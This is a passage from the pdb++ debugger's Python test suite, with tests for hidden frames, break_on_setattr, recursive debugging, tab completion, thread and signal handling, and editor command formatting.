return 'foo' def fn(): g() return 1 check(fn, """ [NUM] > .*fn() -> g() 6 frames hidden .* # down ... Newest frame # hf_unhide # down [NUM] > .*g() -> return 'foo' # up [NUM] > .*fn() -> g() # hf_hide ### hide the frame again # down ... Newest frame # c """) def test_hide_current_frame(): @pdb.hideframe def g(): set_trace() return 'foo' def fn(): g() return 1 check(fn, """ [NUM] > .*fn() -> g() 6 frames hidden .* # hf_unhide # down ### now the frame is no longer hidden [NUM] > .*g() -> return 'foo' # hf_hide ### hide the current frame, go to the top of the stack [NUM] > .*fn() -> g() # c """) def test_hide_frame_for_set_trace_on_class(): def g(): # Simulate set_trace, with frame=None. pdb.cleanup() _pdb = PdbTest() _pdb.set_trace() return 'foo' def fn(): g() return 1 check(fn, """ [NUM] > .*g() -> return 'foo' 5 frames hidden .* # hf_unhide # down \\*\\*\\* Newest frame # c """) def test_list_hidden_frames(): @pdb.hideframe def g(): set_trace() return 'foo' @pdb.hideframe def k(): return g() def fn(): k() return 1 check(fn, r""" [NUM] > .*fn() -> k() 7 frames hidden .* # hf_list .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*k() -> return g() .*g() -> return 'foo' # c """) def test_hidden_pytest_frames(): def s(): __tracebackhide__ = True # Ignored for set_trace in here. 
set_trace() return 'foo' def g(s=s): __tracebackhide__ = True return s() def k(g=g): return g() k = pdb.rebind_globals(k, {'__tracebackhide__': True}) def fn(): k() return 1 check(fn, r""" [NUM] > .*s() -> return 'foo' 7 frames hidden .* # hf_list .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*k() -> return g() .*g() -> return s() # c """) def test_hidden_unittest_frames(): def s(set_trace=set_trace): set_trace() return 'foo' def g(s=s): return s() g = pdb.rebind_globals(g, {'__unittest': True}) def fn(): return g() check(fn, r""" [NUM] > .*s() -> return 'foo' 6 frames hidden .* # hf_list .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*_multicall() -> res = hook_impl.function(\*args) .*g() -> return s() # c """) def test_dont_show_hidden_frames_count(): class MyConfig(ConfigTest): show_hidden_frames_count = False @pdb.hideframe def g(): set_trace(Config=MyConfig) return 'foo' def fn(): g() return 1 check(fn, """ [NUM] > .*fn() -> g() # c ### note that the hidden frame count is not displayed """) def test_disable_hidden_frames(): class MyConfig(ConfigTest): enable_hidden_frames = False @pdb.hideframe def g(): set_trace(Config=MyConfig) return 'foo' def fn(): g() return 1 check(fn, """ [NUM] > .*g() -> return 'foo' # c ### note that we were inside g() """) def test_break_on_setattr(): # we don't use a class decorator to keep 2.5 compatibility class Foo(object): pass Foo = pdb.break_on_setattr('x', Pdb=PdbTest)(Foo) def fn(): obj = Foo() obj.x = 0 return obj.x check(fn, """ [NUM] > .*fn() -> obj.x = 0 5 frames hidden .* # hasattr(obj, 'x') False # n [NUM] > .*fn() -> return obj.x 5 frames hidden .* # p obj.x 0 # c """) def test_break_on_setattr_without_hidden_frames(): class PdbWithConfig(PdbTest): def __init__(self, *args, **kwargs): class Config(ConfigTest): enable_hidden_frames = False super(PdbWithConfig, self).__init__(*args, Config=Config, **kwargs) class Foo(object): pass Foo = pdb.break_on_setattr('x', Pdb=PdbWithConfig)(Foo) def fn(): obj = Foo() obj.x = 0 return obj.x check(fn, """ [NUM] > .*fn() -> obj.x = 0 # hasattr(obj, 'x') False # n [NUM] > .*fn() -> return obj.x # p obj.x 0 # c """) def test_break_on_setattr_condition(): def mycond(obj, value): return value == 42 class Foo(object): pass # we don't use a class decorator to keep 2.5 compatibility Foo = pdb.break_on_setattr('x', condition=mycond, Pdb=PdbTest)(Foo) def fn(): obj = Foo() obj.x = 0 obj.x = 42 return obj.x check(fn, """ [NUM] > .*fn() -> obj.x = 42 5 frames hidden .* # obj.x 0 # n [NUM] > .*fn() -> return obj.x 5 frames hidden .* # obj.x 42 # c """) def test_break_on_setattr_non_decorator(): class Foo(object): pass def fn(): a = Foo() b = Foo() def break_if_a(obj, value): return obj is a pdb.break_on_setattr("bar", condition=break_if_a, Pdb=PdbTest)(Foo) b.bar = 10 a.bar = 42 check(fn, """ [NUM] > .*fn() -> a.bar = 42 5 frames hidden .* # c """) def test_break_on_setattr_overridden(): # we don't use a class decorator to keep 2.5 compatibility class Foo(object): def __setattr__(self, attr, value): object.__setattr__(self, attr, value+1) Foo = pdb.break_on_setattr('x', Pdb=PdbTest)(Foo) def fn(): obj = Foo() obj.y = 41 obj.x = 0 return obj.x check(fn, """ 
[NUM] > .*fn() -> obj.x = 0 5 frames hidden .* # obj.y 42 # hasattr(obj, 'x') False # n [NUM] > .*fn() -> return obj.x 5 frames hidden .* # p obj.x 1 # c """) def test_track_with_no_args(): pytest.importorskip('rpython.translator.tool.reftracker') def fn(): set_trace() return 42 check(fn, """ [NUM] > .*fn() -> return 42 # track ... SyntaxError: # c """) def test_utf8(): def fn(): # тест a = 1 set_trace(Config=ConfigWithHighlight) return a # we cannot easily use "check" because the output is full of ANSI escape # sequences expected, lines = run_func(fn, '# ll\n# c') assert u'тест' in lines[5] def test_debug_normal(): def g(): a = 1 return a def fn(): g() set_trace() return 1 check(fn, """ [NUM] > .*fn() -> return 1 5 frames hidden .* # debug g() ENTERING RECURSIVE DEBUGGER [NUM] > .* (#) s --Call-- [NUM] > .*g() -> def g(): (#) ll NUM -> def g(): NUM a = 1 NUM return a (#) c LEAVING RECURSIVE DEBUGGER # c """) def test_debug_thrice(): def fn(): set_trace() check(fn, """ --Return-- [NUM] > .*fn() -> set_trace() 5 frames hidden .* # debug 1 ENTERING RECURSIVE DEBUGGER [NUM] > .* (#) debug 2 ENTERING RECURSIVE DEBUGGER [NUM] > .* ((#)) debug 34 ENTERING RECURSIVE DEBUGGER [NUM] > .* (((#))) p 42 42 (((#))) c LEAVING RECURSIVE DEBUGGER ((#)) c LEAVING RECURSIVE DEBUGGER (#) c LEAVING RECURSIVE DEBUGGER # c """) def test_syntaxerror_in_command(): expected_debug_err = "ENTERING RECURSIVE DEBUGGER\n\\*\\*\\* SyntaxError: .*" # Python 3.8.0a2+ handles the SyntaxError itself. # Ref/followup: https://github.com/python/cpython/pull/12103 # https://github.com/python/cpython/commit/3e93643 if sys.version_info >= (3, 7, 3): expected_debug_err += "\nLEAVING RECURSIVE DEBUGGER" def f(): set_trace() check(f, """ --Return-- [NUM] > .*f() -> set_trace 5 frames hidden .* # print( \\*\\*\\* SyntaxError: .* # debug print( %s # c """ % expected_debug_err) def test_debug_with_overridden_continue(): class CustomPdb(PdbTest, object): """CustomPdb that overrides do_continue like with pytest's wrapper.""" def do_continue(self, arg): global count_continue count_continue += 1 print("do_continue_%d" % count_continue) return super(CustomPdb, self).do_continue(arg) do_c = do_cont = do_continue def g(): a = 1 return a def fn(): global count_continue count_continue = 0 g() set_trace(Pdb=CustomPdb) set_trace(Pdb=CustomPdb) assert count_continue == 3 return 1 check(fn, """ [NUM] > .*fn() -> set_trace(Pdb=CustomPdb) 5 frames hidden .* # c do_continue_1 [NUM] > .*fn() -> assert count_continue == 3 5 frames hidden .* # debug g() ENTERING RECURSIVE DEBUGGER [NUM] > .* (#) s --Call-- [NUM] > .*g() -> def g(): (#) ll NUM -> def g(): NUM a = 1 NUM return a (#) c do_continue_2 LEAVING RECURSIVE DEBUGGER # c do_continue_3 """) def test_before_interaction_hook(): class MyConfig(ConfigTest): def before_interaction_hook(self, pdb): pdb.stdout.write('HOOK!\n') def fn(): set_trace(Config=MyConfig) return 1 check(fn, """ [NUM] > .*fn() -> return 1 5 frames hidden .* HOOK! 
# c """) def test_unicode_bug(): def fn(): set_trace() x = "this is plain ascii" # noqa: F841 y = "this contains a unicode: à" # noqa: F841 return check_output = """ [NUM] > .*fn() -> x = "this is plain ascii" 5 frames hidden .* # n [NUM] > .*fn() -> y = "this contains a unicode: à" 5 frames hidden .* # c """ if sys.version_info < (3, ): check_output = check_output.decode('utf-8') check(fn, check_output) def test_continue_arg(): def fn(): set_trace() x = 1 y = 2 z = 3 return x+y+z _, lineno = inspect.getsourcelines(fn) line_z = lineno+4 check(fn, """ [NUM] > .*fn() -> x = 1 5 frames hidden .* # c {break_lnum} Breakpoint NUM at {filename}:{break_lnum} Deleted breakpoint NUM [NUM] > .*fn() -> z = 3 5 frames hidden .* # c """.format( break_lnum=line_z, filename=__file__, )) @pytest.mark.skipif(sys.version_info < (3, 7), reason="header kwarg is 3.7+") def test_set_trace_header(): """Handler header kwarg added with Python 3.7 in pdb.set_trace.""" def fn(): set_trace_via_module(header="my_header") check(fn, """ my_header --Return-- [NUM] > .*fn() -> set_trace.* 5 frames hidden .* # c """) def test_stdout_encoding_None(): instance = PdbTest() instance.stdout = BytesIO() instance.stdout.encoding = None instance.ensure_file_can_write_unicode(instance.stdout) try: import cStringIO except ImportError: pass else: instance.stdout = cStringIO.StringIO() instance.ensure_file_can_write_unicode(instance.stdout) def test_frame_cmd_changes_locals(): def a(): x = 42 # noqa: F841 b() def b(): fn() def fn(): set_trace() return check(a, """ [NUM] > .*fn() -> return 5 frames hidden .* # f {frame_num_a} [NUM] > .*a() -> b() # p list(sorted(locals().keys())) ['b', 'x'] # c """.format(frame_num_a=count_frames() + 2 - 5)) @pytest.mark.skipif(not hasattr(pdb.pdb.Pdb, "_cmdloop"), reason="_cmdloop is not available") def test_sigint_in_interaction_with_new_cmdloop(): def fn(): def inner(): raise KeyboardInterrupt() set_trace() check(fn, """ --Return-- [NUM] > .*fn() -> set_trace() 5 frames hidden .* # debug inner() ENTERING RECURSIVE DEBUGGER [NUM] > .* (#) c --KeyboardInterrupt-- # c """) @pytest.mark.skipif(hasattr(pdb.pdb.Pdb, "_cmdloop"), reason="_cmdloop is available") def test_sigint_in_interaction_without_new_cmdloop(): def fn(): def inner(): raise KeyboardInterrupt() set_trace() with pytest.raises(KeyboardInterrupt): check(fn, """ --Return-- [NUM] > .*fn() -> set_trace() 5 frames hidden .* # debug inner() ENTERING RECURSIVE DEBUGGER [NUM] > .* (#) c """) # Reset pdb, which did not clean up correctly. # Needed for PyPy (Python 2.7.13[pypy-7.1.0-final]) with coverage and # restoring trace function. pdb.local.GLOBAL_PDB.reset() def test_debug_rebind_globals(monkeypatch): class PdbWithCustomDebug(pdb.pdb.Pdb): def do_debug(self, arg): if "PdbTest" not in globals(): # Do not use assert here, since it might fail with "NameError: # name '@pytest_ar' is not defined" via pytest's assertion # rewriting then. 
import pytest pytest.fail("PdbTest is not in globals.") print("called_do_debug", Pdb, self) # noqa: F821 monkeypatch.setattr(pdb.pdb, "Pdb", PdbWithCustomDebug) class CustomPdbTest(PdbTest, PdbWithCustomDebug): pass def fn(): def inner(): pass set_trace(Pdb=CustomPdbTest) check(fn, """ --Return-- [NUM] > .*fn() -> set_trace(.*) 5 frames hidden .* # debug inner() called_do_debug.* # c """) @pytest.mark.skipif(not hasattr(pdb.pdb.Pdb, "_previous_sigint_handler"), reason="_previous_sigint_handler is not available") def test_interaction_restores_previous_sigint_handler(): """Test is based on cpython's test_pdb_issue_20766.""" def fn(): i = 1 while i <= 2: sess = PdbTest(nosigint=False) sess.set_trace(sys._getframe()) print('pdb %d: %s' % (i, sess._previous_sigint_handler)) i += 1 check(fn, """ [NUM] > .*fn() -> print('pdb %d: %s' % (i, sess._previous_sigint_handler)) 5 frames hidden .* # c pdb 1: <built-in function default_int_handler> [NUM] > .*fn() -> .* 5 frames hidden .* # c pdb 2: <built-in function default_int_handler> """) def test_recursive_set_trace(): def fn(): global inner global count count = 0 def inner(): global count count += 1 if count == 1: set_trace() else: set_trace(cleanup=False) inner() check(fn, """ --Return-- [NUM] > .*inner() -> set_trace() 5 frames hidden .* # inner() # c """) def test_steps_over_set_trace(): def fn(): set_trace() print(1) set_trace(cleanup=False) print(2) check(fn, """ [NUM] > .*fn() -> print(1) 5 frames hidden .* # n 1 [NUM] > .*fn() -> set_trace(cleanup=False) 5 frames hidden .* # n [NUM] > .*fn() -> print(2) 5 frames hidden .* # c 2 """) def test_break_after_set_trace(): def fn(): set_trace() print(1) print(2) _, lineno = inspect.getsourcelines(fn) check(fn, """ [NUM] > .*fn() -> print(1) 5 frames hidden .* # break {lineno} Breakpoint . at .*:{lineno} # c 1 [NUM] > .*fn() -> print(2) 5 frames hidden .* # import pdb; pdb.local.GLOBAL_PDB.clear_all_breaks() # c 2 """.format(lineno=lineno + 3)) def test_break_with_inner_set_trace(): def fn(): def inner(): set_trace(cleanup=False) set_trace() inner() print(1) _, lineno = inspect.getsourcelines(fn) check(fn, """ [NUM] > .*fn() -> inner() 5 frames hidden .* # break {lineno} Breakpoint . 
at .*:{lineno} # c --Return-- [NUM] > .*inner()->None -> set_trace(cleanup=False) 5 frames hidden .* # import pdb; pdb.local.GLOBAL_PDB.clear_all_breaks() # c 1 """.format(lineno=lineno + 8)) @pytest.mark.skipif( sys.version_info < (3,), reason="no support for exit from interaction with pdbrc" ) def test_pdbrc_continue(tmpdir): """Test that interaction is skipped with continue in pdbrc.""" with tmpdir.as_cwd(): with open(".pdbrc", "w") as f: f.writelines([ "p 'from_pdbrc'\n", "continue\n", ]) def fn(): set_trace(readrc=True) print("after_set_trace") check(fn, """ 'from_pdbrc' after_set_trace """) def test_python_m_pdb_usage(): import subprocess p = subprocess.Popen( [sys.executable, "-m", "pdb"], stdout=subprocess.PIPE, stderr=subprocess.PIPE ) stdout, stderr = p.communicate() out = stdout.decode("utf8") err = stderr.decode("utf8") assert err == "" assert "usage: pdb.py" in out @pytest.mark.skip def test_python_m_pdb_uses_pdbpp(tmphome): import subprocess f = tmphome.ensure("test.py") f.write("import os\n__import__('pdb').set_trace()") p = subprocess.Popen( [sys.executable, "-m", "pdb", str(f)], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE ) stdout, stderr = p.communicate(b"c\n") out = stdout.decode("utf8") err = stderr.decode("utf8") print(out) print(err, file=sys.stderr) assert err == "" assert "(Pdb)" not in out assert "(Pdb++)" in out assert out.endswith("\n(Pdb++) \n") def get_completions(text): """Get completions from the installed completer.""" readline_ = pdb.local.GLOBAL_PDB.fancycompleter.config.readline complete = readline_.get_completer() comps = [] assert complete.__self__ is pdb.local.GLOBAL_PDB while True: val = complete(text, len(comps)) if val is None: break comps += [val] return comps def test_set_trace_in_completion(monkeypatch_readline): def fn(): class CompleteMe(object): attr_called = 0 @property def set_trace_in_attrib(self): self.attr_called += 1 set_trace(cleanup=False) print("inner_set_trace_was_ignored") obj = CompleteMe() def check_completions(): monkeypatch_readline("obj.", 0, 4) comps = get_completions("obj.") assert obj.attr_called == 1, "attr was called" # Colorization only works with pyrepl, via pyrepl.readline._setup. assert any("set_trace_in_attrib" in comp for comp in comps), comps return True set_trace() check(fn, """ --Return-- [NUM] > .*fn() .* 5 frames hidden .* # check_completions() inner_set_trace_was_ignored True # c """) def test_completes_from_pdb(monkeypatch_readline): """Test that pdb's original completion is used.""" def fn(): where = 1 # noqa: F841 set_trace() def check_completions(): # Patch readline to return expected results for "wher". monkeypatch_readline("wher", 0, 4) assert get_completions("wher") == ["where"] if sys.version_info > (3, ): # Patch readline to return expected results for "disable ". monkeypatch_readline("disable", 8, 8) # NOTE: number depends on bpb.Breakpoint class state, just ensure that # is a number. completion = pdb.local.GLOBAL_PDB.complete("", 0) assert int(completion) > 0 # Patch readline to return expected results for "p ". monkeypatch_readline("p ", 2, 2) comps = get_completions("") assert "where" in comps # Dunder members get completed only on second invocation. assert "__name__" not in comps comps = get_completions("") assert "__name__" in comps # Patch readline to return expected results for "help ". 
monkeypatch_readline("help ", 5, 5) comps = get_completions("") assert "help" in comps return True set_trace() _, lineno = inspect.getsourcelines(fn) check(fn, """ [NUM] > .*fn() .* 5 frames hidden .* # break %d Breakpoint NUM at .* # c --Return-- [NUM] > .*fn() .* 5 frames hidden .* # check_completions() True # c """ % lineno) def test_completion_uses_tab_from_fancycompleter(monkeypatch_readline): """Test that pdb's original completion is used.""" def fn(): def check_completions(): # Patch readline to return expected results for "C.f()". monkeypatch_readline("C.f()", 5, 5) assert get_completions("") == ["\t"] return True set_trace() _, lineno = inspect.getsourcelines(fn) check(fn, """ --Return-- [NUM] > .*fn()->None .* 5 frames hidden .* # check_completions() True # c """) def test_complete_removes_duplicates_with_coloring( monkeypatch_readline, readline_param ): def fn(): helpvar = 42 # noqa: F841 def check_completions(): # Patch readline to return expected results for "help". monkeypatch_readline("help", 0, 4) if readline_param == "pyrepl": assert pdb.local.GLOBAL_PDB.fancycompleter.config.use_colors is True assert get_completions("help") == [ "\x1b[000;00m\x1b[00mhelp\x1b[00m", "\x1b[001;00m\x1b[33;01mhelpvar\x1b[00m", " ", ] else: assert pdb.local.GLOBAL_PDB.fancycompleter.config.use_colors is False assert get_completions("help") == ["help", "helpvar"] return True set_trace() _, lineno = inspect.getsourcelines(fn) check(fn, """ --Return-- [NUM] > .*fn()->None .* 5 frames hidden .* # check_completions() True # c """) @pytest.mark.skipif(sys.version_info < (3, ), reason="py2: no completion for break") def test_completion_removes_tab_from_fancycompleter(monkeypatch_readline): def fn(): def check_completions(): # Patch readline to return expected results for "b ". monkeypatch_readline("b ", 2, 2) comps = get_completions("") assert "\t" not in comps assert "inspect" in comps return True set_trace() _, lineno = inspect.getsourcelines(fn) check(fn, """ --Return-- [NUM] > .*fn() .* 5 frames hidden .* # check_completions() True # c """) def test_integration(testdir, tmphome): """Integration test.""" import sys f = tmphome.ensure("test_file.py") f.write("print('before'); __import__('pdb').set_trace(); print('after')") import os assert os.getcwd() == tmphome child = testdir.spawn(sys.executable + " " + str(f), expect_timeout=1) # NOTE: b'\x1b[?12l\x1b[?25h' comes via pyrepl. pdbpp_prompt = "\n(Pdb++) \x1b[?12l\x1b[?25h" child.expect_exact(pdbpp_prompt) # Completes help as unique (coming from pdb and fancycompleter). child.send(b"hel\t") child.expect_exact(b"\x1b[1@h\x1b[1@e\x1b[1@l\x1b[1@p") child.sendline("") child.expect_exact("\r\nDocumented commands") child.expect_exact(pdbpp_prompt) # Completes breakpoints via pdb, should not contain "\t" from # fancycompleter. if sys.version_info >= (3, 3): child.send(b"b \t") child.expect_exact(b'\x1b[1@b\x1b[1@ \x1b[?25ltest_file.py:\x1b[?12l\x1b[?25h') child.sendline("") child.expect_exact( b"\x1b[23D\r\n\r\x1b[?1l\x1b>*** Bad lineno: \r\n" b"\x1b[?1h\x1b=\x1b[?25l\x1b[1A\r\n(Pdb++) \x1b[?12l\x1b[?25h" ) child.sendline("c") rest = child.read() assert rest == b'\x1b[1@c\x1b[9D\r\n\r\x1b[?1l\x1b>' def test_complete_with_bang(monkeypatch_readline): """Test that completion works after "!". This requires parseline to return "" for the command (bpo-35270). """ def fn(): a_var = 1 # noqa: F841 def check_completions(): # Patch readline to return expected results for "!a_va". 
monkeypatch_readline("!a_va", 0, 5) assert pdb.local.GLOBAL_PDB.complete("a_va", 0) == "a_var" # Patch readline to return expected results for "list(a_va". monkeypatch_readline("list(a_va", 5, 9) assert pdb.local.GLOBAL_PDB.complete("a_va", 0) == "a_var" return True set_trace() check(fn, """ --Return-- [NUM] > .*fn() .* 5 frames hidden .* # check_completions() True # c """) def test_completer_after_debug(monkeypatch_readline): def fn(): myvar = 1 # noqa: F841 def inner(): myinnervar = 1 # noqa: F841 def check_completions_inner(): # Patch readline to return expected results for "myin". monkeypatch_readline("myin", 0, 4) assert "myinnervar" in get_completions("myin") return True print("inner_end") def check_completions(): # Patch readline to return expected results for "myva". monkeypatch_readline("myva", 0, 4) assert "myvar" in get_completions("myva") return True set_trace() print("ok_end") check(fn, """ [NUM] > .*fn() .* 5 frames hidden .* # pdb.local.GLOBAL_PDB.curframe.f_code.co_name 'fn' # debug inner() ENTERING RECURSIVE DEBUGGER [1] > <string>(1)<module>() (#) pdb.local.GLOBAL_PDB.curframe.f_code.co_name '<module>' (#) s --Call-- [NUM] > .*inner() -> def inner(): (#) pdb.local.GLOBAL_PDB.curframe.f_code.co_name 'inner' (#) r inner_end --Return-- [NUM] > .*inner()->None -> print("inner_end") (#) check_completions_inner() True (#) q LEAVING RECURSIVE DEBUGGER # check_completions() True # c ok_end """) def test_ensure_file_can_write_unicode(): import io from pdb import DefaultConfig, Pdb out = io.BytesIO(b"") stdout = io.TextIOWrapper(out, encoding="latin1") p = Pdb(Config=DefaultConfig, stdout=stdout) assert p.stdout.stream is out p.stdout.write(u"test äöüß") out.seek(0) assert out.read().decode("utf-8") == u"test äöüß" @pytest.mark.skipif(sys.version_info >= (3, 0), reason="test is python2 specific") def test_py2_ensure_file_can_write_unicode(): import StringIO from pdb import DefaultConfig, Pdb stdout = StringIO.StringIO() stdout.encoding = 'ascii' p = Pdb(Config=DefaultConfig, stdout=stdout) assert p.stdout.stream is stdout p.stdout.write(u"test äöüß") stdout.seek(0) assert stdout.read().decode('utf-8') == u"test äöüß" def test_signal_in_nonmain_thread_with_interaction(): def fn(): import threading evt = threading.Event() def start_thread(): evt.wait() set_trace(nosigint=False) t = threading.Thread(target=start_thread) t.start() set_trace(nosigint=False) evt.set() t.join() check(fn, """ [NUM] > .*fn() -> evt.set() 5 frames hidden .* # c --Return-- [NUM] > .*start_thread()->None -> set_trace(nosigint=False) # c """) def test_signal_in_nonmain_thread_with_continue(): """Test for cpython issue 13120 (test_issue13120). Without the try/execept for ValueError in its do_continue it would display the exception, but work otherwise. 
""" def fn(): import threading def start_thread(): a = 42 # noqa F841 set_trace(nosigint=False) t = threading.Thread(target=start_thread) t.start() # set_trace(nosigint=False) t.join() check(fn, """ --Return-- [NUM] > .*start_thread()->None -> set_trace(nosigint=False) # p a 42 # c """) def test_next_at_end_of_stack_after_unhide(): """Test that compute_stack returns correct length with show_hidden_frames.""" class MyConfig(ConfigTest): def before_interaction_hook(self, pdb): pdb.stdout.write('before_interaction_hook\n') pdb.do_hf_unhide(arg=None) def fn(): set_trace(Config=MyConfig) return 1 check(fn, """ [NUM] > .*fn() -> return 1 5 frames hidden .* before_interaction_hook # n --Return-- [NUM] > .*fn()->1 -> return 1 5 frames hidden .* before_interaction_hook # c """) def test_rawinput_with_debug(): """Test backport of fix for bpo-31078.""" def fn(): set_trace() check(fn, """ --Return-- [NUM] > .*fn() -> set_trace() 5 frames hidden .* # debug 1 ENTERING RECURSIVE DEBUGGER [NUM] > <string>(1)<module>()->None (#) import pdb; print(pdb.local.GLOBAL_PDB.use_rawinput) 1 (#) p sys._getframe().f_back.f_locals['self'].use_rawinput 1 (#) c LEAVING RECURSIVE DEBUGGER # c """) @pytest.mark.skipif(not hasattr(pdb.pdb.Pdb, "error"), reason="no error method") def test_error_with_traceback(): def fn(): def error(): raise ValueError("error") set_trace() check(fn, """ --Return-- [NUM] > .*fn() -> set_trace() 5 frames hidden .* # error() \\*\\*\\* ValueError: error Traceback (most recent call last): File .*, in error raise ValueError("error") # c """) @pytest.mark.skipif(not hasattr(pdb.pdb.Pdb, "error"), reason="no error method") def test_chained_syntaxerror_with_traceback(): def fn(): def compile_error(): compile("invalid(", "<stdin>", "single") def error(): try: compile_error() except Exception: raise AttributeError set_trace() check(fn, """ --Return-- [NUM] > .*fn() -> set_trace() 5 frames hidden .* # error() \\*\\*\\* AttributeError.* Traceback (most recent call last): File .*, in error compile_error() File .*, in compile_error compile.* File "<stdin>", line 1 invalid( .*^ SyntaxError: .* During handling of the above exception, another exception occurred: Traceback (most recent call last): File .*, in error raise AttributeError # c """) @pytest.mark.skipif(not hasattr(pdb.pdb.Pdb, "error"), reason="no error method") def test_error_with_traceback_disabled(): class ConfigWithoutTraceback(ConfigTest): show_traceback_on_error = False def fn(): def error(): raise ValueError("error") set_trace(Config=ConfigWithoutTraceback) check(fn, """ --Return-- [NUM] > .*fn() -> set_trace(Config=ConfigWithoutTraceback) 5 frames hidden .* # error() \\*\\*\\* ValueError: error # c """) @pytest.mark.skipif(not hasattr(pdb.pdb.Pdb, "error"), reason="no error method") def test_error_with_traceback_limit(): class ConfigWithLimit(ConfigTest): show_traceback_on_error_limit = 2 def fn(): def f(i): i -= 1 if i <= 0: raise ValueError("the_end") f(i) def error(): f(10) set_trace(Config=ConfigWithLimit) check(fn, """ --Return-- [NUM] > .*fn() -> set_trace(Config=ConfigWithLimit) 5 frames hidden .* # error() \\*\\*\\* ValueError: the_end Traceback (most recent call last): File .*, in error f(10) File .*, in f f(i) # c """) def test_next_with_exception_in_call(): """Ensure that "next" works correctly with exception (in try/except). Previously it would display the frame where the exception occurred, and then "next" would continue, instead of stopping at the next statement. 
""" def fn(): def keyerror(): raise KeyError set_trace() try: keyerror() except KeyError: print("got_keyerror") check(fn, """ [NUM] > .*fn() -> try: 5 frames hidden .* # n [NUM] > .*fn() -> keyerror() 5 frames hidden .* # n KeyError [NUM] > .*fn() -> keyerror() 5 frames hidden .* # n [NUM] > .*fn() -> except KeyError: 5 frames hidden .* # c got_keyerror """) def test_locals(): def fn(): def f(): set_trace() print("foo=%s" % foo) # noqa: F821 foo = 2 # noqa: F841 f() check(fn, """ [NUM] > .*f() -> print("foo=%s" % foo) 5 frames hidden .* # foo = 42 # foo 42 # pp foo 42 # p foo 42 # c foo=42 """) def test_get_editor_cmd(monkeypatch): _pdb = PdbTest() _pdb.config.editor = None monkeypatch.setenv("EDITOR", "nvim") assert _pdb._get_editor_cmd("fname", 42) == "nvim +42 fname" monkeypatch.setenv("EDITOR", "") with pytest.raises(RuntimeError, match=( r"Could not detect editor. Configure it or set \$EDITOR." )): _pdb._get_editor_cmd("fname", 42) monkeypatch.delenv("EDITOR") try: which = "shutil.which" monkeypatch.setattr(which, lambda x: None) except AttributeError: which = "distutils.spawn.find_executable" monkeypatch.setattr(which, lambda x: None) with pytest.raises(RuntimeError, match=( r"Could not detect editor. Configure it or set \$EDITOR." )): _pdb._get_editor_cmd("fname", 42) monkeypatch.setattr(which, lambda x: "vim") assert _pdb._get_editor_cmd("fname", 42) == "vim +42 fname" monkeypatch.setattr(which, lambda x: "vi") assert _pdb._get_editor_cmd("fname", 42) == "vi +42 fname" _format = _pdb._format_editcmd assert _format("subl {filename}:{lineno}", "with space", 12) == ( "subl 'with space':12") assert _format("edit", "with space", 12) == ( "edit +12 'with space'") assert _format("edit +%%%d %%%s%% %d", "with space", 12) == ( "edit +%12 %'with space'% 12") def test_edit_error(monkeypatch): class MyConfig(ConfigTest): editor = None monkeypatch.setenv("EDITOR", "") def fn(): set_trace(Config=MyConfig) check(fn, r""" --Return-- [NUM] > .*fn() -> set_trace(Config=MyConfig) 5 frames hidden .* # edit \*\*\* Could not detect editor. Configure it or set \$EDITOR. # c """) def test_global_pdb_per_thread_with_input_lock(): def fn(): import threading evt1 = threading.Event() evt2 = threading.Event() def __t1__(evt1, evt2): set_trace(cleanup=False) def __t2__(evt2): evt2.set() set_trace(cleanup=False) t1 = threading.Thread(name="__t1__", target=__t1__, args=(evt1, evt2)) t1.start() assert evt1.wait(1.0) is True t2 = threading.Thread(name="__t2__", target=__t2__, args=(evt2,)) t2.start() t1.join() t2.join() check(fn, r""" --Return-- [NUM] > .*__t1__() -> set_trace(cleanup=False) # evt1.set() # import threading; threading.current_thread().name '__t1__' # assert evt2.wait(1.0) is True; import time; time.sleep(0.1) --Return-- [NUM] > .*__t2__()->None -> set_trace(cleanup=False) # import threading; threading.current_thread().name '__t2__' # c # import threading; threading.current_thread().name '__t1__' # c """) def test_usage_error_with_commands(): def fn(): set_trace() check(fn, r""" --Return-- [NUM] > .*fn()->None -> set_trace() 5 frames hidden .* # commands invalid .*Usage.*: commands [bnum] ... 
end # c """) @pytest.mark.skipif(sys.version_info < (3,), reason="py2 has no support for kwonly") def test_rebind_globals_kwonly(): exec("def func(*args, header=None): pass", globals()) func = globals()["func"] sig = str(inspect.signature(func)) assert sig == "(*args, header=None)" new = pdb.rebind_globals(func, globals()) assert str(inspect.signature(new)) == sig @pytest.mark.skipif(sys.version_info < (3,), reason="py2 has no support for annotations") def test_rebind_globals_annotations(): exec("def func(ann: str = None): pass", globals()) func = globals()["func"] sig = str(inspect.signature(func)) if sys.version_info < (3, 5): assert sig == "(ann:str=None)" else: assert sig in ( "(ann: str = None)", "(ann:str=None)", ) new = pdb.rebind_globals(func, globals()) assert str(inspect.signature(new)) == sig def test_debug_with_set_trace(): def fn(): def inner(): def inner_inner(): pass set_trace(cleanup=False) set_trace() check(fn, """ --Return-- [NUM] > .*fn() .* 5 frames hidden .* # debug inner() ENTERING RECURSIVE DEBUGGER [NUM] > <string>(1)<module>()->None (#) r --Return-- [NUM] > .*inner()->None -> set_trace(cleanup=False) 5 frames hidden .* (#) pdb.local.GLOBAL_PDB.curframe.f_code.co_name 'inner' (#) debug inner_inner() ENTERING RECURSIVE DEBUGGER [NUM] > <string>(1)<module>()->None ((#)) c LEAVING RECURSIVE DEBUGGER (#) c LEAVING RECURSIVE DEBUGGER # c """) def test_set_trace_with_incomplete_pdb(): def fn(): existing_pdb = PdbTest() assert not hasattr(existing_pdb, "botframe") set_trace(cleanup=False) assert hasattr(existing_pdb, "botframe") assert pdb.local.GLOBAL_PDB is existing_pdb check(fn, """ [NUM] > .*fn() .* 5 frames hidden .* # c """) def test_config_gets_start_filename(): def fn(): setup_lineno = set_trace.__code__.co_firstlineno + 8 set_trace_lineno = sys._getframe().f_lineno + 8 class MyConfig(ConfigTest): def setup(self, pdb): print("config_setup") assert pdb.start_filename == __file__ assert pdb.start_lineno == setup_lineno 